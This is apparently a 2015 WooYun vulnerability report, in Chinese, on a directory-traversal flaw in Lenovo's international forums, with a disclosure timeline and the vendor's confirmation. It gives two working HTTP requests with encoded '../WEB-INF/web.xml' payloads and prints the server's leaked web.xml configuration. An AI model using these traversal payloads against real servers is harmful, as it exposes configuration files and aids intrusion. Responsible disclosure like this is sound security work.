乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-16: 细节已通知厂商并且等待厂商处理中 2015-03-16: 厂商已经确认,细节仅向厂商公开 2015-03-26: 细节向核心白帽子及相关领域专家公开 2015-04-05: 细节向普通白帽子公开 2015-04-15: 细节向实习白帽子公开 2015-04-30: 细节向公众公开
国际论坛forums.lenovo.com.两处打包
GET /lnv/?category.id=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Cache-Control: no-cacheHost: forums.lenovo.com.Accept-Encoding: gzip, deflate
GET /lnv/board/message?board.id=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d&thread.id=1 HTTP/1.1Referer: http://forums.lenovo.com./Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: forums.lenovo.com.Accept-Encoding: gzip, deflate
Content-Length: 16894Connection: closeContent-Type: text/xml;charset=UTF-8<?xml version="1.0" encoding="ISO-8859-1"?><web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4"> <display-name>web2</display-name> <session-config> <session-timeout>30</session-timeout> </session-config> <context-param> <param-name>jspellLexicons</param-name> <param-value>res/jspell/</param-value> </context-param> <context-param> <param-name>tapestry.app-package</param-name> <param-value>lithium.web2</param-value> </context-param> <listener> <listener-class>lithium.servlet.session.ApplicationSessionTrackerHttpSessionListener</listener-class> <listener-class>lithium.reporting.metrics.unique.UniqueMetricProcessorHttpSessionListener</listener-class> <listener-class>lithium.user.UserSessionListener</listener-class> </listener> <!-- ================================================================= Filters --> <filter> <filter-name>characterEncodingFilter</filter-name> <filter-class>lithium.servlet.CharacterEncodingFilter</filter-class> </filter> <filter> <filter-name>putTomcatRequestFilter</filter-name> <filter-class>lithium.servlet.PutTomcatRequestinAttributeFilter</filter-class> </filter> <filter> <filter-name>applicationSelectorFilter</filter-name> <filter-class>lithium.apps.main.container.filters.ApplicationSelectorFilter</filter-class> </filter> <filter> <filter-name>clickjackingFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>p3pHeaderFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>clearStateFilter</filter-name> <filter-class>lithium.boards.servlet.ClearStateFilter</filter-class> </filter> <filter> <filter-name>trackingFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>operationsLoggingFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>blackboxFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>liaTapestryFilter</filter-name> <filter-class>lithium.web2.services.servlet.LiaTapestryFilter</filter-class> </filter> <filter> <filter-name>facebookSignedRequestFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>rewriteFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> <init-param> <param-name>targetFilterLifecycle</param-name> <param-value>true</param-value> </init-param> </filter> <filter> <filter-name>httpRequestContextFilter</filter-name> <filter-class>lithium.servlet.HttpRequestContextFilter</filter-class> </filter> <filter> <filter-name>agentDetectionFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>sessionIdStripperFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>setHeaderValidationFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>metricsFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>requestTransformFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>replicatedSessionFilter</filter-name> <filter-class>lithium.servlet.session.ReplicatedSessionFilter</filter-class> </filter> <filter> <filter-name>userSessionFilterWeb2</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>realtimeNotificationAuthFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>visitorFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>bannedUserFilterChainWeb2</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>mimeFilter</filter-name> <filter-class>lithium.servlet.MimeFilter</filter-class> <init-param> <param-name>charset.encoding</param-name> <param-value>UTF-8</param-value> </init-param> </filter> <filter> <filter-name>clientDeviceDetectionFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>limitFilterChainWeb2</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>funnelFilterChain</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>pageCacheFilterChain</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>forwardedHeadersFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>canonicalIpFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>vanityHostnameRedirectFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>accessCheckFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>notSecureSessionCookieFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>sipDomainRequestManagerFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <filter> <filter-name>multipartRequestFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <!-- Adds a non-reversible hashed IP as a request attribute lithium.servlet.HashedIpFilter.HASHED_IP_ATTR. Must come before maskedIpFilter (so it has access to full IP). --> <filter> <filter-name>hashedIpFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <!-- Masks the IP address (wraps the HttpServletRequest) for anonymous requests. Adds a boolean request attribute lithium.servlet.MaskedIpFilter.IS_MASKED ("true" or "false" depending on if the IP is masked). --> <filter> <filter-name>maskedIpFilter</filter-name> <filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class> </filter> <!-- ================================================================= Filter Mappings Determines which filters run for given url patterns or servlet names. Note that the filters execute in this order. --> <filter-mapping> <filter-name>characterEncodingFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>putTomcatRequestFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <!-- applicationSelectorFilter needs to occur before any filter which depends on a specific application context. --> <filter-mapping> <filter-name>applicationSelectorFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>ERROR</dispatcher> </filter-mapping> <filter-mapping> <filter-name>funnelFilterChain</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <!-- The forwardedHeadersFilter filter needs to be before the canonicalIpFilter filter since it modifies the request headers. --> <filter-mapping> <filter-name>forwardedHeadersFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <!-- The canonicalIpFilter filter needs to be before any filter that accesses, logs, or otherwise uses the remoteAddr from the request. --> <filter-mapping> <filter-name>canonicalIpFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>vanityHostnameRedirectFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>p3pHeaderFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>accessCheckFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <!-- the notSecureSessionCookieFilter needs to be before the RewriteFilter and the UserSessionFilter to prevent infinite redirects --> <filter-mapping> <filter-name>notSecureSessionCookieFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>sipDomainRequestManagerFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>clearStateFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>trackingFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>operationsLoggingFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>blackboxFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>facebookSignedRequestFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>rewriteFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>replicatedSessionFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>agentDetectionFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>sessionIdStripperFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>setHeaderValidationFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>metricsFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>requestTransformFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>limitFilterChainWeb2</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>mimeFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>multipartRequestFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>userSessionFilterWeb2</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>realtimeNotificationAuthFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>visitorFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>bannedUserFilterChainWeb2</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>clientDeviceDetectionFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>pageCacheFilterChain</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>hashedIpFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>maskedIpFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter-mapping> <filter-name>httpRequestContextFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> <dispatcher>ERROR</dispatcher> </filter-mapping> <filter-mapping> <filter-name>liaTapestryFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> <dispatcher>ERROR</dispatcher> </filter-mapping> <filter-mapping> <filter-name>clickjackingFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> </filter-mapping> <!-- ================================================================= Servlets --> <servlet> <servlet-name>javaScriptServlet</servlet-name> <servlet-class>lithium.util.http.DelegatingApplicationServletProxy</servlet-class> </servlet> <servlet> <servlet-name>cssServlet</servlet-name> <servlet-class>lithium.util.http.DelegatingApplicationServletProxy</servlet-class> </servlet> <!-- ================================================================= Servlet Mappings --> <servlet-mapping> <servlet-name>javaScriptServlet</servlet-name> <url-pattern>/scripts/*</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>cssServlet</servlet-name> <url-pattern>/assets/css/*</url-pattern> </servlet-mapping> <!-- ================================================================= Error Page Mappings --> <error-page> <error-code>404</error-code> <location>/errors/error404page</location> </error-page> <!-- ================================================================= Mime Mappings --> <mime-mapping> <extension>html</extension> <mime-type>text/html</mime-type> </mime-mapping> <mime-mapping> <extension>css</extension> <mime-type>text/css</mime-type> </mime-mapping> <mime-mapping> <extension>js</extension> <mime-type>text/javascript</mime-type> </mime-mapping> <mime-mapping> <extension>gif</extension> <mime-type>image/gif</mime-type> </mime-mapping> <mime-mapping> <extension>jpg</extension> <mime-type>image/jpeg</mime-type> </mime-mapping> <mime-mapping> <extension>png</extension> <mime-type>image/png</mime-type> </mime-mapping> <mime-mapping> <extension>bmp</extension> <mime-type>image/bmp</mime-type> </mime-mapping> <mime-mapping> <extension>au</extension> <mime-type>audio/basic</mime-type> </mime-mapping> <mime-mapping> <extension>jad</extension> <mime-type>text/vnd.sun.j2me.app-descriptor</mime-type> </mime-mapping> <mime-mapping> <extension>jar</extension> <mime-type>application/java-archive</mime-type> </mime-mapping> <mime-mapping> <extension>cab</extension> <mime-type>application/java-archive</mime-type> </mime-mapping> <mime-mapping> <extension>xml</extension> <mime-type>text/xml</mime-type> </mime-mapping> <mime-mapping> <extension>txt</extension> <mime-type>text/plain</mime-type> </mime-mapping> <mime-mapping> <extension>class</extension> <mime-type>application/octet-stream</mime-type> </mime-mapping> <mime-mapping> <extension>cacert</extension> <mime-type>application/x-x509-ca-cert</mime-type> </mime-mapping>。。。。。。。。。。。。。。。。。。。。。。。。。。。。
危害等级:中
漏洞Rank:10
确认时间:2015-03-16 15:01
谢谢您对联想安全工作的支持,我们会尽快修复漏洞
暂无